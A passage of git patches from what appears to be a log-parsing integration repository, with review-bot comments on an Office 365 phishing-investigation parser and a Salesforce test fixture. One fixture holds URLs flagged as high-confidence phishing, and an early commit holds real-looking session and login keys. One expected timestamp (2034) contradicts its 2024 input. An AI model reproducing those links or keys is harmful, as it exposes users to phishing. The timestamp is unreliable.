"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_11_1.jpg", + "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2B7I3RFKjR2LTj-2FCdqvCgUA-3De-zv_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6otxpVGSalyLT-2BMyMS7yEfvbLbY9v9Wjn3hkHG29S-2FBOFjoVX-2FSwv2kZeymJW-2FlgRvHCB20rH0kwYqIdOsdO-2FvuCq-2BU49-2FNEo4S2gaZRd0h3zn5MFhXxj-2F-2FbW3X5gOaGP7-2FpGN-2BX-2BHRi1Xt1JzFgCpA", + "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2BkzPoBjfVNj9CJCtsLW0zwNgmTcKgWQoyoJpwVuYlpQciOV7VFY4y40pT7PbFjZu-2BT61qNz-2FjLIbrl5IqV-2F6VA-3Dowc9_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oKxDmfijZNNeoMjhZ1voAZ4rYtu5m9xdiEh8pCCrwyFrXAffKU6vpGqbxQY4O5g0v8B7yN8HEfrFjo7Fn7G-2FQVkuoVw1L-2FcSqVGgGsGEOY4-2BG2cvJmEd1era-2FAnl53IvDmt-2FjEc5wDjePqx-2Ff9ahD7", + "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz1dNl4cyoCqQhbWGcqggHJW8SDLFVls-2FdSGWRn2n26uXgiSb-2FLZ3Oc-2F6taFyBHXTJv-2BdvE0YkDtEsaWUVnnpz7Lus9fp2MjvsYOqibyuC9Sjzgm4flo2XfvY4y5mBWuQF-2F7nM55pZ5S6S-2BSuNa5j-2BID5HJzdZOlXc2nyvbxmDFrTDuau_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oCyme2zPY6GKJBwI7FWZYrXhePHLdzV5WL-2F5EJubwqlYflj1CI9yL7Xfb24ks7WDE2wa8hQ-2BQ3h8K7-2FNpWkzEtiEQPiPEF3zOMzaOlqjkbPLg0UzpEmObjky1BycKoXMMwtfEuHLB9VnhNmDV3aIW2", + 
"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz49R6-2B-2FASLo-2BUtlyP-2F4iSjQlm-2F4HWFki90oq-2Bc29Sr-2BJAxlu_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6qR2GRWjTyLjKHBwmcXgTV-2BMq0R5qnuDMHYAbrFxAmtHiepp1aU8L-2FOCt-2BiboZksoqBfuo-2FcqBrfi9un8ILJByRUOZM3T6alRzsB1jmdLOKOZwr3m8kymuz3dFvNya6aYPmSZG4l57ycCGBya5xMMqf", + "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xzwS57HzRFV06M2bzMBaRY-2BtdD2HhGOqR6HD9j7eU3woqib3lW0qFsRIYtEfnDRINtIJErjGpQG2ad3jjAbAIacwJ4Le0eScR4TY1ExyusbvGQU5p_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6psejQMn2EzritsHjoZX3rBM6GN1Gt7OeDjl2fzK-2BAK5-2FzHIjoTmyFKIkBvxn4mrKqstgF5tkhF6rc-2BIL2TqH7FTpqHdxk6lMOLfZVS4DrhiP-2FvyHZwSo2RzY-2BDmTRvcBEOqOwutpZKgr0m7fArTF-2Fv" + ] + }, + "emails": [ + { + "message_ids": [ + "24b8430c-484d-4ee0-e12b-08dcee99416a", + "2e99f39a-c998-4d94-2085-08dce9cd0b7d", + "0ac4ee3c-7c79-408e-76c2-08dcf4106b65", + "fd400540-8a8d-42ae-d1f9-08dced20c42f", + "31cfca73-f309-4e21-cbc4-08dceed074cf", + "0491b33a-15fc-4503-9dd1-08dced818f57", + "4b620244-917b-4a04-7416-08dcf50af378", + "1abed68d-3b03-46bd-45e2-08dcf43fb625", + "abb4c4a5-7049-4047-5a68-08dcec201c1f", + "92bba720-15bc-4f09-49f2-08dcf8d738a4", + "3d511617-b717-416c-89cf-08dcf90a51c7", + "c3ad4b6b-0fd9-4510-4481-08dcf9043502", + "37b236bd-ad39-41c0-3984-08dcf85e6b44", + "a1d9684c-9982-4f80-880c-08dcf775c1a9" + ] + }, + { + "message_ids": [ + "37b236bd-ad39-41c0-3984-08dcf85e6b44" + ] + }, + { + "delivery": { + "action": "Blocked", + "location": "Quarantine", + "original_location": "Inbox" + }, + "direction": "Inbound", + "language": "fr", + "message_ids": [ + "37b236bd-ad39-41c0-3984-08dcf85e6b44" + ] + } + ], + "id": 
"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101", + "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101", + "status": "Pending Action", + "threats": [ + "['ZapPhish', 'HighConfPhish']" + ], + "type": "ZappedUrlInvestigation" + }, + "record_type": 64, + "user_type": { + "code": 4, + "name": "System" + } + }, + "organization": { + "id": "xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx" + }, + "related": { + "user": [ + "AirInvestigation" + ] + }, + "rule": { + "name": "Email messages containing malicious URL removed after delivery\u200b" + }, + "service": { + "name": "AirInvestigation" + }, + "user": { + "id": "AirInvestigation", + "name": "AirInvestigation" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json index 62483cf44..6e6d8fd0f 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json @@ -82,6 +82,7 @@ "http://1.2.3.7" ] }, + "emails": [], "id": "urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86", "name": "Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1", "status": "Remediated", diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json index d1b102ddf..a3a57df24 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json 
@@ -79,7 +79,23 @@ }, "emails": [ { - "message_ids": "['01a2bcd3-efab-4c56-7890-12defa3bc4d', '0123a456-b789-0cd1-e23f-45abcd6ef78', 'ab12cde3-f456-789a-01bc-23defa4bc5d', '01a2b345-67c8-9012-345d-67efabc8d90e', '01a234b5-6789-012c-3d4e-56fabcd7ef8', 'a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6', '0a1b23c4-567d-8901-2345-67efabc8d90a', '0123a4b5-678c-9d0e-1f23-45abcde6fa78', '0a1b234c-5678-90d1-2efa-34bcdef5a6b7', '0123a4bc-5d6e-78f9-0123-45abcde67890']" + "message_ids": [ + "01a2bcd3-efab-4c56-7890-12defa3bc4d", + "0123a456-b789-0cd1-e23f-45abcd6ef78", + "ab12cde3-f456-789a-01bc-23defa4bc5d", + "01a2b345-67c8-9012-345d-67efabc8d90e", + "01a234b5-6789-012c-3d4e-56fabcd7ef8", + "a0bcd12e-3456-7f89-0a1b-23cdefa4b5c6", + "0a1b23c4-567d-8901-2345-67efabc8d90a", + "0123a4b5-678c-9d0e-1f23-45abcde6fa78", + "0a1b234c-5678-90d1-2efa-34bcdef5a6b7", + "0123a4bc-5d6e-78f9-0123-45abcde67890" + ] + }, + { + "message_ids": [ + "ab12cde3-f456-789a-01bc-23defa4bc5d" + ] }, { "delivery": { diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json index fe752fcbe..61b656511 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json @@ -85,6 +85,20 @@ "https://example.org" ] }, + "emails": [ + { + "delivery": { + "action": "Blocked", + "location": "Quarantine", + "original_location": "Inbox" + }, + "direction": "Inbound", + "language": "en", + "message_ids": [ + "3fe5777d-1fb7-4f34-bb1e-035e4df1f96f" + ] + } + ], "id": "urn:ZappedFileInvestigation:adffaf6ed0f17079cf14e9dc2adf9c1d", "name": "Mail with malicious file is zapped - urn:ZappedFileInvestigation:adffaf6ed0f17079cf14e9dc2adf9c1d", "status": "Investigation Started", From 498e60ad8198791aac6bc7c4cd3559e7668e189f Mon Sep 17 00:00:00 2001 
From: "vladyslav.guriev"
Date: Wed, 6 Nov 2024 15:32:02 +0200
Subject: [PATCH 196/317] cleanup parser
---
 Office 365/o365/ingest/parser.yml | 34 +++++++++++--------------------
 1 file changed, 12 insertions(+), 22 deletions(-)
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 61a06f847..07ea2f0c8 100644
--- a/Office 365/o365/ingest/parser.yml
+++ b/Office 365/o365/ingest/parser.yml
@@ -494,26 +494,16 @@ stages:
 - set:
 office365.investigation.emails: >
 [
- {%- for action in json_event.message.Actions | map("from_json") -%}
- {%- for entity in action.Entities -%}
- {
- {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%}
- {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%}
- {%- if entity.NetworkMessageId != null -%}"message_ids": ["{{entity.NetworkMessageId}}"],{%- endif -%}
- {%- if entity.Language != null -%}"language": "{{entity.Language}}",{%- endif -%}
- {%- if entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
- "delivery": {
- {%- if entity.DeliveryAction!= null -%}"action": "{{entity.DeliveryAction}}",{%- endif -%}
- {%- if entity.DeliveryLocation != null -%}"location": "{{entity.DeliveryLocation}}",{%- endif -%}
- {%- if entity.OriginalDeliveryLocation -%}"original_location": "{{entity.OriginalDeliveryLocation}}",{%- endif -%}
- },
- {%- endif -%}
- },
- {%- endfor -%}
- {%- endfor -%}
-
- {%- for entity in parse_data.ParsedData.Entities -%}
- {%- if entity.AntispamDirection != null or entity.NetworkMessageIds != null or entity.Language != null or entity.DeliveryAction != null or entity.DeliveryLocation != null or entity.OriginalDeliveryLocation != null -%}
+ {% set total_entities = [] %}
+ {% for action in json_event.message.Actions | map("from_json") %}
+ {% for entity in action.Entities %}
+ {% set total_entities = total_entities.append(entity) %}
+ {% endfor %}
+ {% endfor %}
+ {% for entity in parse_data.ParsedData.Entities %}
+ {% set total_entities = total_entities.append(entity) %}
+ {% endfor %}
+ {%- for entity in total_entities -%}
 {
 {%- if entity.AntispamDirection != null -%}"direction": "{{entity.AntispamDirection}}",{%- endif -%}
 {%- if entity.NetworkMessageIds != null -%}"message_ids": {{entity.NetworkMessageIds}},{%- endif -%}
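Review bot: The two added accumulation lines `{% set total_entities = total_entities.append(entity) %}` rebind the name to the `None` that `append` returns, and the template only keeps working because Jinja re-aliases the loop-scoped variable from the outer list at the start of every iteration, which is an easy thing to break and reads like a bug to anyone unfamiliar with that scoping rule. Writing both as `{% set _ = total_entities.append(entity) %}` makes the in-place mutation explicit and no longer depends on the loop re-aliasing. The ten new tags also drop the `-` whitespace control that every surrounding `{%- ... -%}` line uses, so their indentation and newlines are emitted into the rendered array ahead of the first object; a JSON parser tolerates that, but `{%- ... -%}` would keep the output compact and consistent with the rest of the template. Note that the old `if` guard on the ParsedData entities is gone, so an entity carrying none of the tracked fields now renders as an empty `{}` element here and is only dropped by the `data != {}` check added in the next hunk.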
@@ -527,17 +517,17 @@ stages:
 },
 {%- endif -%}
 },
- {%- endif -%}
 {%- endfor -%}
 ]
 filter: '{{(json_event.message.get("Actions") != None and json_event.message.Actions | map("from_json") | rejectattr("Entities") | list | length != json_event.message.Actions | list | length) or parse_data.ParsedData.get("Entities", []) | length > 0}}'
+ # Filter step to remove duplicates from the list
 - set:
 office365.investigation.emails: >
 [
 {% set result = [] %}
 {% for data in final.office365.investigation.emails %}
- {% if data not in result %}
+ {% if data not in result and data != {} %}
 {% set result = result.append(data) %}
 {% endif %}
 {% endfor %}
From 4154e0ae785eb3b0a71393a338ecaf0185d827b3 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev"
Date: Wed, 6 Nov 2024 15:39:35 +0200
Subject: [PATCH 197/317] Fix: Salesforce USER_AGENT
---
 .../tests/salesforce_apex_rest_api.json | 72 +++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
new file mode 100644
index 000000000..bc47bdc36
--- /dev/null
+++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
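Review bot: The added comment `# Filter step to remove duplicates from the list` under-describes the step now that `data != {}` is part of the condition: with the `if` guard removed from the previous stage in the hunk above, this is the only place where the empty `{}` objects produced for entities without any tracked field are discarded. Suggest `# Drop duplicate and empty entries; the previous step emits {} for entities with no tracked field` so that a later cleanup does not remove the `data != {}` clause as redundant. The `{% if data not in result and data != {} %}` line itself is fine, since Jinja compares the rendered dicts by value.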
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}" + }, + "expected": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}", + "event": { + "category": [ + "network" + ], + "dataset": "ApexRestApi", + "type": [ + "info" + ] + }, + 
"@timestamp": "2034-02-21T02:48:31.272150Z", + "http": { + "request": { + "method": "POST" + }, + "response": { + "mime_type": "application/json", + "status_code": 200 + } + }, + "organization": { + "id": "00D2000000015O7" + }, + "related": { + "ip": [ + "129.185.166.150" + ] + }, + "salesforce": { + "login": { + "key": "MJK3WHqyl1nGTQHf" + }, + "request": { + "id": "5-Acr8biM2uu2UsrkBY5B-", + "status": "S" + }, + "session": { + "key": { + "id": "E6btf+6MZDOBIAEF" + } + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "129.185.166.150", + "ip": "129.185.166.150" + }, + "url": { + "path": "/requests" + }, + "user": { + "id": "0057R000008Vnyi" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "9999", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file From b6d4a9e42babc2d32b3734b4ffc2c06a1aba6a5d Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:44:25 +0200 Subject: [PATCH 198/317] fix test --- .../tests/salesforce_apex_rest_api.json | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index bc47bdc36..8c729ea91 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json 
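Review bot: The expected `"@timestamp": "2034-02-21T02:48:31.272150Z"` does not match the event it is derived from: both `TIMESTAMP` (`20241029112721.500`) and `TIMESTAMP_DERIVED` (`2024-10-29T11:27:21.500Z`) in the input message place the event on 2024-10-29, so the fixture pins a value roughly ten years in the future. The digits of that expected value line up with the `TIMESTAMP` string being interpreted as a scaled numeric epoch rather than as a `YYYYMMDDhhmmss.SSS` date, which points at the parser (outside this diff) rather than at the fixture, but committing the expectation as written would lock the wrong behaviour in and make it invisible to the test run. Once the parsing is corrected the expectation should be `"@timestamp": "2024-10-29T11:27:21.500000Z"` (or the same instant in whatever precision the parser emits), matching `TIMESTAMP_DERIVED`.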
@@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": 
"{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" 
@@ -24,16 +24,16 @@ } }, "organization": { - "id": "00D2000000015O7" + "id": "11111111111111111" }, "related": { "ip": [ - "129.185.166.150" + "1.2.3.4" ] }, "salesforce": { "login": { - "key": "MJK3WHqyl1nGTQHf" + "key": "xxxxxxxxxxxxxx" }, "request": { "id": "5-Acr8biM2uu2UsrkBY5B-", @@ -49,14 +49,14 @@ } }, "source": { - "address": "129.185.166.150", - "ip": "129.185.166.150" + "address": "1.2.3.4", + "ip": "1.2.3.4" }, "url": { "path": "/requests" }, "user": { - "id": "0057R000008Vnyi" + "id": "user123123123123" }, "user_agent": { "device": { From fc4fc8f197c1c509f4e6b82cbd042d406d4bdbf2 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:44:54 +0200 Subject: [PATCH 199/317] fix test --- .../salesforce-events/tests/salesforce_apex_rest_api.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index 8c729ea91..c6a4ab44a 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": 
